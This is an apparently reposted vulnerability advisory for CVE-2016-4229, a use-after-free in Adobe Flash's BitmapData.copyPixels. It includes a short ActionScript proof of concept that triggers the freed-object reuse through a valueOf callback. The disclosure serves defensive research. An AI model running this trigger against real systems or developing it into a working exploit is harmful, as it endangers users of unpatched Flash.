###########################

# Adobe Flash BitmapData.copyPixels Use-After-Free Vulnerability

###########################

Adobe Flash: Use-after-free in BitmapData.copyPixels - 

CVE-2016-4229


There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});


function func(){

	mc.removeMovieClip();
	
	// Fix the heap	
	
	}


<b>This bug is subject to a 90 day disclosure deadline. If 90 days elapse</b>
<b>without a broadly available patch, then the bug report will automatically</b>
<b>become visible to the public.</b>



Found by: natashenka



###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-08-30]

###########################